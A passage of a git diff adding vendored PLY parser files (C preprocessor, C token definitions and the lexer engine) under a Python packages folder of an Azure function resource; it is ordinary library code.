# Remove leading/trailing whitespace tokens from a token list + # ---------------------------------------------------------------------- + + def tokenstrip(self,tokens): + i = 0 + while i < len(tokens) and tokens[i].type in self.t_WS: + i += 1 + del tokens[:i] + i = len(tokens)-1 + while i >= 0 and tokens[i].type in self.t_WS: + i -= 1 + del tokens[i+1:] + return tokens + + + # ---------------------------------------------------------------------- + # collect_args() + # + # Collects comma separated arguments from a list of tokens. The arguments + # must be enclosed in parenthesis. Returns a tuple (tokencount,args,positions) + # where tokencount is the number of tokens consumed, args is a list of arguments, + # and positions is a list of integers containing the starting index of each + # argument. Each argument is represented by a list of tokens. + # + # When collecting arguments, leading and trailing whitespace is removed + # from each argument. + # + # This function properly handles nested parenthesis and commas---these do not + # define new arguments. + # ---------------------------------------------------------------------- + + def collect_args(self,tokenlist): + args = [] + positions = [] + current_arg = [] + nesting = 1 + tokenlen = len(tokenlist) + + # Search for the opening '('. + i = 0 + while (i < tokenlen) and (tokenlist[i].type in self.t_WS): + i += 1 + + if (i < tokenlen) and (tokenlist[i].value == '('): + positions.append(i+1) + else: + self.error(self.source,tokenlist[0].lineno,"Missing '(' in macro arguments") + return 0, [], [] + + i += 1 + + while i < tokenlen: + t = tokenlist[i] + if t.value == '(': + current_arg.append(t) + nesting += 1 + elif t.value == ')': + nesting -= 1 + if nesting == 0: + if current_arg: + args.append(self.tokenstrip(current_arg)) + positions.append(i) + return i+1,args,positions + current_arg.append(t) + elif t.value == ',' and nesting == 1: + args.append(self.tokenstrip(current_arg)) + positions.append(i+1) + current_arg = [] + else: + current_arg.append(t) + i += 1 + + # Missing end argument + self.error(self.source,tokenlist[-1].lineno,"Missing ')' in macro arguments") + return 0, [],[] + + # ---------------------------------------------------------------------- + # macro_prescan() + # + # Examine the macro value (token sequence) and identify patch points + # This is used to speed up macro expansion later on---we'll know + # right away where to apply patches to the value to form the expansion + # ---------------------------------------------------------------------- + + def macro_prescan(self,macro): + macro.patch = [] # Standard macro arguments + macro.str_patch = [] # String conversion expansion + macro.var_comma_patch = [] # Variadic macro comma patch + i = 0 + while i < len(macro.value): + if macro.value[i].type == self.t_ID and macro.value[i].value in macro.arglist: + argnum = macro.arglist.index(macro.value[i].value) + # Conversion of argument to a string + if i > 0 and macro.value[i-1].value == '#': + macro.value[i] = copy.copy(macro.value[i]) + macro.value[i].type = self.t_STRING + del macro.value[i-1] + macro.str_patch.append((argnum,i-1)) + continue + # Concatenation + elif (i > 0 and macro.value[i-1].value == '##'): + macro.patch.append(('c',argnum,i-1)) + del macro.value[i-1] + continue + elif ((i+1) < len(macro.value) and macro.value[i+1].value == '##'): + macro.patch.append(('c',argnum,i)) + i += 1 + continue + # Standard expansion + else: + macro.patch.append(('e',argnum,i)) + elif macro.value[i].value == '##': + if macro.variadic and (i > 0) and (macro.value[i-1].value == ',') and \ + ((i+1) < len(macro.value)) and (macro.value[i+1].type == self.t_ID) and \ + (macro.value[i+1].value == macro.vararg): + macro.var_comma_patch.append(i-1) + i += 1 + macro.patch.sort(key=lambda x: x[2],reverse=True) + + # ---------------------------------------------------------------------- + # macro_expand_args() + # + # Given a Macro and list of arguments (each a token list), this method + # returns an expanded version of a macro. The return value is a token sequence + # representing the replacement macro tokens + # ---------------------------------------------------------------------- + + def macro_expand_args(self,macro,args): + # Make a copy of the macro token sequence + rep = [copy.copy(_x) for _x in macro.value] + + # Make string expansion patches. These do not alter the length of the replacement sequence + + str_expansion = {} + for argnum, i in macro.str_patch: + if argnum not in str_expansion: + str_expansion[argnum] = ('"%s"' % "".join([x.value for x in args[argnum]])).replace("\\","\\\\") + rep[i] = copy.copy(rep[i]) + rep[i].value = str_expansion[argnum] + + # Make the variadic macro comma patch. If the variadic macro argument is empty, we get rid + comma_patch = False + if macro.variadic and not args[-1]: + for i in macro.var_comma_patch: + rep[i] = None + comma_patch = True + + # Make all other patches. The order of these matters. It is assumed that the patch list + # has been sorted in reverse order of patch location since replacements will cause the + # size of the replacement sequence to expand from the patch point. + + expanded = { } + for ptype, argnum, i in macro.patch: + # Concatenation. Argument is left unexpanded + if ptype == 'c': + rep[i:i+1] = args[argnum] + # Normal expansion. Argument is macro expanded first + elif ptype == 'e': + if argnum not in expanded: + expanded[argnum] = self.expand_macros(args[argnum]) + rep[i:i+1] = expanded[argnum] + + # Get rid of removed comma if necessary + if comma_patch: + rep = [_i for _i in rep if _i] + + return rep + + + # ---------------------------------------------------------------------- + # expand_macros() + # + # Given a list of tokens, this function performs macro expansion. + # The expanded argument is a dictionary that contains macros already + # expanded. This is used to prevent infinite recursion. + # ---------------------------------------------------------------------- + + def expand_macros(self,tokens,expanded=None): + if expanded is None: + expanded = {} + i = 0 + while i < len(tokens): + t = tokens[i] + if t.type == self.t_ID: + if t.value in self.macros and t.value not in expanded: + # Yes, we found a macro match + expanded[t.value] = True + + m = self.macros[t.value] + if not m.arglist: + # A simple macro + ex = self.expand_macros([copy.copy(_x) for _x in m.value],expanded) + for e in ex: + e.lineno = t.lineno + tokens[i:i+1] = ex + i += len(ex) + else: + # A macro with arguments + j = i + 1 + while j < len(tokens) and tokens[j].type in self.t_WS: + j += 1 + if tokens[j].value == '(': + tokcount,args,positions = self.collect_args(tokens[j:]) + if not m.variadic and len(args) != len(m.arglist): + self.error(self.source,t.lineno,"Macro %s requires %d arguments" % (t.value,len(m.arglist))) + i = j + tokcount + elif m.variadic and len(args) < len(m.arglist)-1: + if len(m.arglist) > 2: + self.error(self.source,t.lineno,"Macro %s must have at least %d arguments" % (t.value, len(m.arglist)-1)) + else: + self.error(self.source,t.lineno,"Macro %s must have at least %d argument" % (t.value, len(m.arglist)-1)) + i = j + tokcount + else: + if m.variadic: + if len(args) == len(m.arglist)-1: + args.append([]) + else: + args[len(m.arglist)-1] = tokens[j+positions[len(m.arglist)-1]:j+tokcount-1] + del args[len(m.arglist):] + + # Get macro replacement text + rep = self.macro_expand_args(m,args) + rep = self.expand_macros(rep,expanded) + for r in rep: + r.lineno = t.lineno + tokens[i:j+tokcount] = rep + i += len(rep) + del expanded[t.value] + continue + elif t.value == '__LINE__': + t.type = self.t_INTEGER + t.value = self.t_INTEGER_TYPE(t.lineno) + + i += 1 + return tokens + + # ---------------------------------------------------------------------- + # evalexpr() + # + # Evaluate an expression token sequence for the purposes of evaluating + # integral expressions. + # ---------------------------------------------------------------------- + + def evalexpr(self,tokens): + # tokens = tokenize(line) + # Search for defined macros + i = 0 + while i < len(tokens): + if tokens[i].type == self.t_ID and tokens[i].value == 'defined': + j = i + 1 + needparen = False + result = "0L" + while j < len(tokens): + if tokens[j].type in self.t_WS: + j += 1 + continue + elif tokens[j].type == self.t_ID: + if tokens[j].value in self.macros: + result = "1L" + else: + result = "0L" + if not needparen: break + elif tokens[j].value == '(': + needparen = True + elif tokens[j].value == ')': + break + else: + self.error(self.source,tokens[i].lineno,"Malformed defined()") + j += 1 + tokens[i].type = self.t_INTEGER + tokens[i].value = self.t_INTEGER_TYPE(result) + del tokens[i+1:j+1] + i += 1 + tokens = self.expand_macros(tokens) + for i,t in enumerate(tokens): + if t.type == self.t_ID: + tokens[i] = copy.copy(t) + tokens[i].type = self.t_INTEGER + tokens[i].value = self.t_INTEGER_TYPE("0L") + elif t.type == self.t_INTEGER: + tokens[i] = copy.copy(t) + # Strip off any trailing suffixes + tokens[i].value = str(tokens[i].value) + while tokens[i].value[-1] not in "0123456789abcdefABCDEF": + tokens[i].value = tokens[i].value[:-1] + + expr = "".join([str(x.value) for x in tokens]) + expr = expr.replace("&&"," and ") + expr = expr.replace("||"," or ") + expr = expr.replace("!"," not ") + try: + result = eval(expr) + except Exception: + self.error(self.source,tokens[0].lineno,"Couldn't evaluate expression") + result = 0 + return result + + # ---------------------------------------------------------------------- + # parsegen() + # + # Parse an input string/ + # ---------------------------------------------------------------------- + def parsegen(self,input,source=None): + + # Replace trigraph sequences + t = trigraph(input) + lines = self.group_lines(t) + + if not source: + source = "" + + self.define("__FILE__ \"%s\"" % source) + + self.source = source + chunk = [] + enable = True + iftrigger = False + ifstack = [] + + for x in lines: + for i,tok in enumerate(x): + if tok.type not in self.t_WS: break + if tok.value == '#': + # Preprocessor directive + + # insert necessary whitespace instead of eaten tokens + for tok in x: + if tok.type in self.t_WS and '\n' in tok.value: + chunk.append(tok) + + dirtokens = self.tokenstrip(x[i+1:]) + if dirtokens: + name = dirtokens[0].value + args = self.tokenstrip(dirtokens[1:]) + else: + name = "" + args = [] + + if name == 'define': + if enable: + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + self.define(args) + elif name == 'include': + if enable: + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + oldfile = self.macros['__FILE__'] + for tok in self.include(args): + yield tok + self.macros['__FILE__'] = oldfile + self.source = source + elif name == 'undef': + if enable: + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + self.undef(args) + elif name == 'ifdef': + ifstack.append((enable,iftrigger)) + if enable: + if not args[0].value in self.macros: + enable = False + iftrigger = False + else: + iftrigger = True + elif name == 'ifndef': + ifstack.append((enable,iftrigger)) + if enable: + if args[0].value in self.macros: + enable = False + iftrigger = False + else: + iftrigger = True + elif name == 'if': + ifstack.append((enable,iftrigger)) + if enable: + result = self.evalexpr(args) + if not result: + enable = False + iftrigger = False + else: + iftrigger = True + elif name == 'elif': + if ifstack: + if ifstack[-1][0]: # We only pay attention if outer "if" allows this + if enable: # If already true, we flip enable False + enable = False + elif not iftrigger: # If False, but not triggered yet, we'll check expression + result = self.evalexpr(args) + if result: + enable = True + iftrigger = True + else: + self.error(self.source,dirtokens[0].lineno,"Misplaced #elif") + + elif name == 'else': + if ifstack: + if ifstack[-1][0]: + if enable: + enable = False + elif not iftrigger: + enable = True + iftrigger = True + else: + self.error(self.source,dirtokens[0].lineno,"Misplaced #else") + + elif name == 'endif': + if ifstack: + enable,iftrigger = ifstack.pop() + else: + self.error(self.source,dirtokens[0].lineno,"Misplaced #endif") + else: + # Unknown preprocessor directive + pass + + else: + # Normal text + if enable: + chunk.extend(x) + + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + + # ---------------------------------------------------------------------- + # include() + # + # Implementation of file-inclusion + # ---------------------------------------------------------------------- + + def include(self,tokens): + # Try to extract the filename and then process an include file + if not tokens: + return + if tokens: + if tokens[0].value != '<' and tokens[0].type != self.t_STRING: + tokens = self.expand_macros(tokens) + + if tokens[0].value == '<': + # Include <...> + i = 1 + while i < len(tokens): + if tokens[i].value == '>': + break + i += 1 + else: + print("Malformed #include <...>") + return + filename = "".join([x.value for x in tokens[1:i]]) + path = self.path + [""] + self.temp_path + elif tokens[0].type == self.t_STRING: + filename = tokens[0].value[1:-1] + path = self.temp_path + [""] + self.path + else: + print("Malformed #include statement") + return + for p in path: + iname = os.path.join(p,filename) + try: + data = open(iname,"r").read() + dname = os.path.dirname(iname) + if dname: + self.temp_path.insert(0,dname) + for tok in self.parsegen(data,filename): + yield tok + if dname: + del self.temp_path[0] + break + except IOError: + pass + else: + print("Couldn't find '%s'" % filename) + + # ---------------------------------------------------------------------- + # define() + # + # Define a new macro + # ---------------------------------------------------------------------- + + def define(self,tokens): + if isinstance(tokens,STRING_TYPES): + tokens = self.tokenize(tokens) + + linetok = tokens + try: + name = linetok[0] + if len(linetok) > 1: + mtype = linetok[1] + else: + mtype = None + if not mtype: + m = Macro(name.value,[]) + self.macros[name.value] = m + elif mtype.type in self.t_WS: + # A normal macro + m = Macro(name.value,self.tokenstrip(linetok[2:])) + self.macros[name.value] = m + elif mtype.value == '(': + # A macro with arguments + tokcount, args, positions = self.collect_args(linetok[1:]) + variadic = False + for a in args: + if variadic: + print("No more arguments may follow a variadic argument") + break + astr = "".join([str(_i.value) for _i in a]) + if astr == "...": + variadic = True + a[0].type = self.t_ID + a[0].value = '__VA_ARGS__' + variadic = True + del a[1:] + continue + elif astr[-3:] == "..." and a[0].type == self.t_ID: + variadic = True + del a[1:] + # If, for some reason, "." is part of the identifier, strip off the name for the purposes + # of macro expansion + if a[0].value[-3:] == '...': + a[0].value = a[0].value[:-3] + continue + if len(a) > 1 or a[0].type != self.t_ID: + print("Invalid macro argument") + break + else: + mvalue = self.tokenstrip(linetok[1+tokcount:]) + i = 0 + while i < len(mvalue): + if i+1 < len(mvalue): + if mvalue[i].type in self.t_WS and mvalue[i+1].value == '##': + del mvalue[i] + continue + elif mvalue[i].value == '##' and mvalue[i+1].type in self.t_WS: + del mvalue[i+1] + i += 1 + m = Macro(name.value,mvalue,[x[0].value for x in args],variadic) + self.macro_prescan(m) + self.macros[name.value] = m + else: + print("Bad macro definition") + except LookupError: + print("Bad macro definition") + + # ---------------------------------------------------------------------- + # undef() + # + # Undefine a macro + # ---------------------------------------------------------------------- + + def undef(self,tokens): + id = tokens[0].value + try: + del self.macros[id] + except LookupError: + pass + + # ---------------------------------------------------------------------- + # parse() + # + # Parse input text. + # ---------------------------------------------------------------------- + def parse(self,input,source=None,ignore={}): + self.ignore = ignore + self.parser = self.parsegen(input,source) + + # ---------------------------------------------------------------------- + # token() + # + # Method to return individual tokens + # ---------------------------------------------------------------------- + def token(self): + try: + while True: + tok = next(self.parser) + if tok.type not in self.ignore: return tok + except StopIteration: + self.parser = None + return None + +if __name__ == '__main__': + import ply.lex as lex + lexer = lex.lex() + + # Run a preprocessor + import sys + f = open(sys.argv[1]) + input = f.read() + + p = Preprocessor(lexer) + p.parse(input,sys.argv[1]) + while True: + tok = p.token() + if not tok: break + print(p.source, tok) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ctokens.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ctokens.py new file mode 100644 index 0000000..9189a39 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ctokens.py @@ -0,0 +1,133 @@ +# ---------------------------------------------------------------------- +# ctokens.py +# +# Token specifications for symbols in ANSI C and C++. This file is +# meant to be used as a library in other tokenizers. +# ---------------------------------------------------------------------- + +# Reserved words + +tokens = [ + # Literals (identifier, integer constant, float constant, string constant, char const) + 'ID', 'TYPEID', 'INTEGER', 'FLOAT', 'STRING', 'CHARACTER', + + # Operators (+,-,*,/,%,|,&,~,^,<<,>>, ||, &&, !, <, <=, >, >=, ==, !=) + 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'MODULO', + 'OR', 'AND', 'NOT', 'XOR', 'LSHIFT', 'RSHIFT', + 'LOR', 'LAND', 'LNOT', + 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE', + + # Assignment (=, *=, /=, %=, +=, -=, <<=, >>=, &=, ^=, |=) + 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', 'PLUSEQUAL', 'MINUSEQUAL', + 'LSHIFTEQUAL','RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', 'OREQUAL', + + # Increment/decrement (++,--) + 'INCREMENT', 'DECREMENT', + + # Structure dereference (->) + 'ARROW', + + # Ternary operator (?) + 'TERNARY', + + # Delimeters ( ) [ ] { } , . ; : + 'LPAREN', 'RPAREN', + 'LBRACKET', 'RBRACKET', + 'LBRACE', 'RBRACE', + 'COMMA', 'PERIOD', 'SEMI', 'COLON', + + # Ellipsis (...) + 'ELLIPSIS', +] + +# Operators +t_PLUS = r'\+' +t_MINUS = r'-' +t_TIMES = r'\*' +t_DIVIDE = r'/' +t_MODULO = r'%' +t_OR = r'\|' +t_AND = r'&' +t_NOT = r'~' +t_XOR = r'\^' +t_LSHIFT = r'<<' +t_RSHIFT = r'>>' +t_LOR = r'\|\|' +t_LAND = r'&&' +t_LNOT = r'!' +t_LT = r'<' +t_GT = r'>' +t_LE = r'<=' +t_GE = r'>=' +t_EQ = r'==' +t_NE = r'!=' + +# Assignment operators + +t_EQUALS = r'=' +t_TIMESEQUAL = r'\*=' +t_DIVEQUAL = r'/=' +t_MODEQUAL = r'%=' +t_PLUSEQUAL = r'\+=' +t_MINUSEQUAL = r'-=' +t_LSHIFTEQUAL = r'<<=' +t_RSHIFTEQUAL = r'>>=' +t_ANDEQUAL = r'&=' +t_OREQUAL = r'\|=' +t_XOREQUAL = r'\^=' + +# Increment/decrement +t_INCREMENT = r'\+\+' +t_DECREMENT = r'--' + +# -> +t_ARROW = r'->' + +# ? +t_TERNARY = r'\?' + +# Delimeters +t_LPAREN = r'\(' +t_RPAREN = r'\)' +t_LBRACKET = r'\[' +t_RBRACKET = r'\]' +t_LBRACE = r'\{' +t_RBRACE = r'\}' +t_COMMA = r',' +t_PERIOD = r'\.' +t_SEMI = r';' +t_COLON = r':' +t_ELLIPSIS = r'\.\.\.' + +# Identifiers +t_ID = r'[A-Za-z_][A-Za-z0-9_]*' + +# Integer literal +t_INTEGER = r'\d+([uU]|[lL]|[uU][lL]|[lL][uU])?' + +# Floating literal +t_FLOAT = r'((\d+)(\.\d+)(e(\+|-)?(\d+))? | (\d+)e(\+|-)?(\d+))([lL]|[fF])?' + +# String literal +t_STRING = r'\"([^\\\n]|(\\.))*?\"' + +# Character constant 'c' or L'c' +t_CHARACTER = r'(L)?\'([^\\\n]|(\\.))*?\'' + +# Comment (C-Style) +def t_COMMENT(t): + r'/\*(.|\n)*?\*/' + t.lexer.lineno += t.value.count('\n') + return t + +# Comment (C++-Style) +def t_CPPCOMMENT(t): + r'//.*\n' + t.lexer.lineno += 1 + return t + + + + + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/lex.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/lex.py new file mode 100644 index 0000000..87cab12 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/lex.py @@ -0,0 +1,1099 @@ +# ----------------------------------------------------------------------------- +# ply: lex.py +# +# Copyright (C) 2001-2017 +# David M. Beazley (Dabeaz LLC) +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the David Beazley or Dabeaz LLC may be used to +# endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# ----------------------------------------------------------------------------- + +__version__ = '3.10' +__tabversion__ = '3.10' + +import re +import sys +import types +import copy +import os +import inspect + +# This tuple contains known string types +try: + # Python 2.6 + StringTypes = (types.StringType, types.UnicodeType) +except AttributeError: + # Python 3.0 + StringTypes = (str, bytes) + +# This regular expression is used to match valid token names +_is_identifier = re.compile(r'^[a-zA-Z0-9_]+$') + +# Exception thrown when invalid token encountered and no default error +# handler is defined. +class LexError(Exception): + def __init__(self, message, s): + self.args = (message,) + self.text = s + + +# Token class. This class is used to represent the tokens produced. +class LexToken(object): + def __str__(self): + return 'LexToken(%s,%r,%d,%d)' % (self.type, self.value, self.lineno, self.lexpos) + + def __repr__(self): + return str(self) + + +# This object is a stand-in for a logging object created by the +# logging module. + +class PlyLogger(object): + def __init__(self, f): + self.f = f + + def critical(self, msg, *args, **kwargs): + self.f.write((msg % args) + '\n') + + def warning(self, msg, *args, **kwargs): + self.f.write('WARNING: ' + (msg % args) + '\n') + + def error(self, msg, *args, **kwargs): + self.f.write('ERROR: ' + (msg % args) + '\n') + + info = critical + debug = critical + + +# Null logger is used when no output is generated. Does nothing. +class NullLogger(object): + def __getattribute__(self, name): + return self + + def __call__(self, *args, **kwargs): + return self + + +# ----------------------------------------------------------------------------- +# === Lexing Engine === +# +# The following Lexer class implements the lexer runtime. There are only +# a few public methods and attributes: +# +# input() - Store a new string in the lexer +# token() - Get the next token +# clone() - Clone the lexer +# +# lineno - Current line number +# lexpos - Current position in the input string +# ----------------------------------------------------------------------------- + +class Lexer: + def __init__(self): + self.lexre = None # Master regular expression. This is a list of + # tuples (re, findex) where re is a compiled + # regular expression and findex is a list + # mapping regex group numbers to rules + self.lexretext = None # Current regular expression strings + self.lexstatere = {} # Dictionary mapping lexer states to master regexs + self.lexstateretext = {} # Dictionary mapping lexer states to regex strings + self.lexstaterenames = {} # Dictionary mapping lexer states to symbol names + self.lexstate = 'INITIAL' # Current lexer state + self.lexstatestack = [] # Stack of lexer states + self.lexstateinfo = None # State information + self.lexstateignore = {} # Dictionary of ignored characters for each state + self.lexstateerrorf = {} # Dictionary of error functions for each state + self.lexstateeoff = {} # Dictionary of eof functions for each state + self.lexreflags = 0 # Optional re compile flags + self.lexdata = None # Actual input data (as a string) + self.lexpos = 0 # Current position in input text + self.lexlen = 0 # Length of the input text + self.lexerrorf = None # Error rule (if any) + self.lexeoff = None # EOF rule (if any) + self.lextokens = None # List of valid tokens + self.lexignore = '' # Ignored characters + self.lexliterals = '' # Literal characters that can be passed through + self.lexmodule = None # Module + self.lineno = 1 # Current line number + self.lexoptimize = False # Optimized mode + + def clone(self, object=None): + c = copy.copy(self) + + # If the object parameter has been supplied, it means we are attaching the + # lexer to a new object. In this case, we have to rebind all methods in + # the lexstatere and lexstateerrorf tables. + + if object: + newtab = {} + for key, ritem in self.lexstatere.items(): + newre = [] + for cre, findex in ritem: + newfindex = [] + for f in findex: + if not f or not f[0]: + newfindex.append(f) + continue + newfindex.append((getattr(object, f[0].__name__), f[1])) + newre.append((cre, newfindex)) + newtab[key] = newre + c.lexstatere = newtab + c.lexstateerrorf = {} + for key, ef in self.lexstateerrorf.items(): + c.lexstateerrorf[key] = getattr(object, ef.__name__) + c.lexmodule = object + return c + + # ------------------------------------------------------------ + # writetab() - Write lexer information to a table file + # ------------------------------------------------------------ + def writetab(self, lextab, outputdir=''): + if isinstance(lextab, types.ModuleType): + raise IOError("Won't overwrite existing lextab module") + basetabmodule = lextab.split('.')[-1] + filename = os.path.join(outputdir, basetabmodule) + '.py' + with open(filename, 'w') as tf: + tf.write('# %s.py. This file automatically created by PLY (version %s). Don\'t edit!\n' % (basetabmodule, __version__)) + tf.write('_tabversion = %s\n' % repr(__tabversion__)) + tf.write('_lextokens = set(%s)\n' % repr(tuple(self.lextokens))) + tf.write('_lexreflags = %s\n' % repr(self.lexreflags)) + tf.write('_lexliterals = %s\n' % repr(self.lexliterals)) + tf.write('_lexstateinfo = %s\n' % repr(self.lexstateinfo)) + + # Rewrite the lexstatere table, replacing function objects with function names + tabre = {} + for statename, lre in self.lexstatere.items(): + titem = [] + for (pat, func), retext, renames in zip(lre, self.lexstateretext[statename], self.lexstaterenames[statename]): + titem.append((retext, _funcs_to_names(func, renames))) + tabre[statename] = titem + + tf.write('_lexstatere = %s\n' % repr(tabre)) + tf.write('_lexstateignore = %s\n' % repr(self.lexstateignore)) + + taberr = {} + for statename, ef in self.lexstateerrorf.items(): + taberr[statename] = ef.__name__ if ef else None + tf.write('_lexstateerrorf = %s\n' % repr(taberr)) + + tabeof = {} + for statename, ef in self.lexstateeoff.items(): + tabeof[statename] = ef.__name__ if ef else None + tf.write('_lexstateeoff = %s\n' % repr(tabeof)) + + # ------------------------------------------------------------ + # readtab() - Read lexer information from a tab file + # ------------------------------------------------------------ + def readtab(self, tabfile, fdict): + if isinstance(tabfile, types.ModuleType): + lextab = tabfile + else: + exec('import %s' % tabfile) + lextab = sys.modules[tabfile] + + if getattr(lextab, '_tabversion', '0.0') != __tabversion__: + raise ImportError('Inconsistent PLY version') + + self.lextokens = lextab._lextokens + self.lexreflags = lextab._lexreflags + self.lexliterals = lextab._lexliterals + self.lextokens_all = self.lextokens | set(self.lexliterals) + self.lexstateinfo = lextab._lexstateinfo + self.lexstateignore = lextab._lexstateignore + self.lexstatere = {} + self.lexstateretext = {} + for statename, lre in lextab._lexstatere.items(): + titem = [] + txtitem = [] + for pat, func_name in lre: + titem.append((re.compile(pat, lextab._lexreflags), _names_to_funcs(func_name, fdict))) + + self.lexstatere[statename] = titem + self.lexstateretext[statename] = txtitem + + self.lexstateerrorf = {} + for statename, ef in lextab._lexstateerrorf.items(): + self.lexstateerrorf[statename] = fdict[ef] + + self.lexstateeoff = {} + for statename, ef in lextab._lexstateeoff.items(): + self.lexstateeoff[statename] = fdict[ef] + + self.begin('INITIAL') + + # ------------------------------------------------------------ + # input() - Push a new string into the lexer + # ------------------------------------------------------------ + def input(self, s): + # Pull off the first character to see if s looks like a string + c = s[:1] + if not isinstance(c, StringTypes): + raise ValueError('Expected a string') + self.lexdata = s + self.lexpos = 0 + self.lexlen = len(s) + + # ------------------------------------------------------------ + # begin() - Changes the lexing state + # ------------------------------------------------------------ + def begin(self, state): + if state not in self.lexstatere: + raise ValueError('Undefined state') + self.lexre = self.lexstatere[state] + self.lexretext = self.lexstateretext[state] + self.lexignore = self.lexstateignore.get(state, '') + self.lexerrorf = self.lexstateerrorf.get(state, None) + self.lexeoff = self.lexstateeoff.get(state, None) + self.lexstate = state + + # ------------------------------------------------------------ + # push_state() - Changes the lexing state and saves old on stack + # ------------------------------------------------------------ + def push_state(self, state): + self.lexstatestack.append(self.lexstate) + self.begin(state) + + # ------------------------------------------------------------ + # pop_state() - Restores the previous state + # ------------------------------------------------------------ + def pop_state(self): + self.begin(self.lexstatestack.pop()) + + # ------------------------------------------------------------ + # current_state() - Returns the current lexing state + # ------------------------------------------------------------ + def current_state(self): + return self.lexstate + + # ------------------------------------------------------------ + # skip() - Skip ahead n characters + # ------------------------------------------------------------ + def skip(self, n): + self.lexpos += n + + # ------------------------------------------------------------ + # opttoken() - Return the next token from the Lexer + # + # Note: This function has been carefully implemented to be as fast + # as possible. Don't make changes unless you really know what + # you are doing + # ------------------------------------------------------------ + def token(self): + # Make local copies of frequently referenced attributes + lexpos = self.lexpos + lexlen = self.lexlen + lexignore = self.lexignore + lexdata = self.lexdata + + while lexpos < lexlen: + # This code provides some short-circuit code for whitespace, tabs, and other ignored characters + if lexdata[lexpos] in lexignore: + lexpos += 1 + continue + + # Look for a regular expression match + for lexre, lexindexfunc in self.lexre: + m = lexre.match(lexdata, lexpos) + if not m: + continue + + # Create a token for return + tok = LexToken() + tok.value = m.group() + tok.lineno = self.lineno + tok.lexpos = lexpos + + i = m.lastindex + func, tok.type = lexindexfunc[i] + + if not func: + # If no token type was set, it's an ignored token + if tok.type: + self.lexpos = m.end() + return tok + else: + lexpos = m.end() + break + + lexpos = m.end() + + # If token is processed by a function, call it + + tok.lexer = self # Set additional attributes useful in token rules + self.lexmatch = m + self.lexpos = lexpos + + newtok = func(tok) + + # Every function must return a token, if nothing, we just move to next token + if not newtok: + lexpos = self.lexpos # This is here in case user has updated lexpos. + lexignore = self.lexignore # This is here in case there was a state change + break + + # Verify type of the token. If not in the token map, raise an error + if not self.lexoptimize: + if newtok.type not in self.lextokens_all: + raise LexError("%s:%d: Rule '%s' returned an unknown token type '%s'" % ( + func.__code__.co_filename, func.__code__.co_firstlineno, + func.__name__, newtok.type), lexdata[lexpos:]) + + return newtok + else: + # No match, see if in literals + if lexdata[lexpos] in self.lexliterals: + tok = LexToken() + tok.value = lexdata[lexpos] + tok.lineno = self.lineno + tok.type = tok.value + tok.lexpos = lexpos + self.lexpos = lexpos + 1 + return tok + + # No match. Call t_error() if defined. + if self.lexerrorf: + tok = LexToken() + tok.value = self.lexdata[lexpos:] + tok.lineno = self.lineno + tok.type = 'error' + tok.lexer = self + tok.lexpos = lexpos + self.lexpos = lexpos + newtok = self.lexerrorf(tok) + if lexpos == self.lexpos: + # Error method didn't change text position at all. This is an error. + raise LexError("Scanning error. Illegal character '%s'" % (lexdata[lexpos]), lexdata[lexpos:]) + lexpos = self.lexpos + if not newtok: + continue + return newtok + + self.lexpos = lexpos + raise LexError("Illegal character '%s' at index %d" % (lexdata[lexpos], lexpos), lexdata[lexpos:]) + + if self.lexeoff: + tok = LexToken() + tok.type = 'eof' + tok.value = '' + tok.lineno = self.lineno + tok.lexpos = lexpos + tok.lexer = self + self.lexpos = lexpos + newtok = self.lexeoff(tok) + return newtok + + self.lexpos = lexpos + 1 + if self.lexdata is None: + raise RuntimeError('No input string given with input()') + return None + + # Iterator interface + def __iter__(self): + return self + + def next(self): + t = self.token() + if t is None: + raise StopIteration + return t + + __next__ = next + +# ----------------------------------------------------------------------------- +# ==== Lex Builder === +# +# The functions and classes below are used to collect lexing information +# and build a Lexer object from it. +# ----------------------------------------------------------------------------- + +# ----------------------------------------------------------------------------- +# _get_regex(func) +# +# Returns the regular expression assigned to a function either as a doc string +# or as a .regex attribute attached by the @TOKEN decorator. +# ----------------------------------------------------------------------------- +def _get_regex(func): + return getattr(func, 'regex', func.__doc__) + +# ----------------------------------------------------------------------------- +# get_caller_module_dict() +# +# This function returns a dictionary containing all of the symbols defined within +# a caller further down the call stack. This is used to get the environment 